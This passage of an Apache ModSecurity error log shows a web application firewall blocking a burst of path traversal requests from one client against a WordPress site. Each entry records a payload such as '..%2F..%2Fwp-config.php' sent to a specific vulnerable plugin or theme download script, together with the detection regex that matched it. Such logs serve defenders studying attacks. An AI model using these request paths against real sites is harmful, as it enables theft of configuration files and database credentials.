"Y0ZxTNmZws0mEkXxGo-VNwAAAJI"] [Wed Oct 12 02:48:30.041387 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:49818] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-e-commerce/wpsc-includes/misc.functions.php"] [unique_id "Y0ZxTtmZws0mEkXxGo-VOQAAAIg"] [Wed Oct 12 02:48:30.199403 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:49820] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php"] [unique_id "Y0ZxTuLrJ0tgpRmNRAaHjwAAANc"] [Wed Oct 12 02:48:30.356350 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:49822] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/modules/Miranda.class.php?page=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/modules/Miranda.class.php"] [unique_id "Y0ZxTuLrJ0tgpRmNRAaHkAAAANE"] [Wed Oct 12 02:48:30.516891 2022] [:error] [pid 22337:tid 140534572447488] [client 185.189.115.30:49824] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y0ZxTqBKlkjFPqrcdjM3qQAAAAM"] [Wed Oct 12 02:48:30.668696 2022] [:error] [pid 22337:tid 140534475646720] [client 185.189.115.30:49826] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "Y0ZxTqBKlkjFPqrcdjM3qgAAAAY"] [Wed Oct 12 02:48:30.840042 2022] [:error] [pid 22337:tid 140534467254016] [client 185.189.115.30:49828] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=..%2F..%2F..%2Fwp-config.php&info=wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cip4-folder-download-widget/cip4-download.php"] [unique_id "Y0ZxTqBKlkjFPqrcdjM3qwAAAAc"] [Wed Oct 12 02:48:31.896718 2022] [:error] [pid 22972:tid 140534589232896] [client 185.189.115.30:49832] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/duena/download.php?f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/duena/download.php"] [unique_id "Y0ZxT-LrJ0tgpRmNRAaHkgAAAME"] [Wed Oct 12 02:48:32.109697 2022] [:error] [pid 22337:tid 140534597625600] [client 185.189.115.30:49834] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/endlesshorizon/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/endlesshorizon/download.php"] [unique_id "Y0ZxUKBKlkjFPqrcdjM3rAAAAAA"] [Wed Oct 12 02:48:32.261342 2022] [:error] [pid 22972:tid 140534425290496] [client 185.189.115.30:49836] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/mTheme-Unus/css/css.php"] [unique_id "Y0ZxUOLrJ0tgpRmNRAaHkwAAAMw"] [Wed Oct 12 02:48:32.421956 2022] [:error] [pid 22338:tid 140534433683200] [client 185.189.115.30:49838] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "Y0ZxUGINFIoIk7hPzpaZHwAAAEs"] [Wed Oct 12 02:48:32.572561 2022] [:error] [pid 22339:tid 140534589232896] [client 185.189.115.30:49840] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/estrutura-basica/scripts/download.php?arquivo=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/estrutura-basica/scripts/download.php"] [unique_id "Y0ZxUNmZws0mEkXxGo-VOgAAAIE"] [Wed Oct 12 02:48:32.739699 2022] [:error] [pid 22339:tid 140534383326976] [client 185.189.115.30:49842] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/zip-attachments/download.php?za_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "Y0ZxUNmZws0mEkXxGo-VOwAAAJE"] [Wed Oct 12 02:48:33.813459 2022] [:error] [pid 22972:tid 140534564054784] [client 185.189.115.30:49846] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "Y0ZxUeLrJ0tgpRmNRAaHlAAAAMQ"] [Wed Oct 12 02:48:34.944575 2022] [:error] [pid 22338:tid 140534484039424] [client 185.189.115.30:49850] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php"] [unique_id "Y0ZxUmINFIoIk7hPzpaZIAAAAEU"] [Wed Oct 12 02:48:35.095515 2022] [:error] [pid 22972:tid 140534450468608] [client 185.189.115.30:49852] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "Y0ZxU-LrJ0tgpRmNRAaHlQAAAMk"] [Wed Oct 12 02:48:35.265240 2022] [:error] [pid 22972:tid 140534391719680] [client 185.189.115.30:49856] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/acento/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/acento/includes/view-pdf.php"] [unique_id "Y0ZxU-LrJ0tgpRmNRAaHlgAAANA"] [Wed Oct 12 02:48:35.470498 2022] [:error] [pid 22339:tid 140534475646720] [client 185.189.115.30:49858] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fiestaresidences/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fiestaresidences/download.php"] [unique_id "Y0ZxU9mZws0mEkXxGo-VPQAAAIY"] [Wed Oct 12 02:48:35.621315 2022] [:error] [pid 22338:tid 140534589232896] [client 185.189.115.30:49860] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/optimus/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/optimus/download.php"] [unique_id "Y0ZxU2INFIoIk7hPzpaZIQAAAEE"] [Wed Oct 12 02:48:35.772974 2022] [:error] [pid 22339:tid 140534332970752] [client 185.189.115.30:49862] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/erinvale/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/erinvale/download.php"] [unique_id "Y0ZxU9mZws0mEkXxGo-VPgAAAJc"] [Wed Oct 12 02:48:35.934426 2022] [:error] [pid 22338:tid 140534341363456] [client 185.189.115.30:49864] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hsv/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hsv/download.php"] [unique_id "Y0ZxU2INFIoIk7hPzpaZIgAAAFY"] [Wed Oct 12 02:48:36.095008 2022] [:error] [pid 22972:tid 140534374934272] [client 185.189.115.30:49866] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "Y0ZxVOLrJ0tgpRmNRAaHlwAAANI"] [Wed Oct 12 02:48:36.245980 2022] [:error] [pid 22338:tid 140534597625600] [client 185.189.115.30:49870] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "Y0ZxVGINFIoIk7hPzpaZJAAAAEA"] [Wed Oct 12 02:48:36.396874 2022] [:error] [pid 22339:tid 140534324578048] [client 185.189.115.30:49872] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match 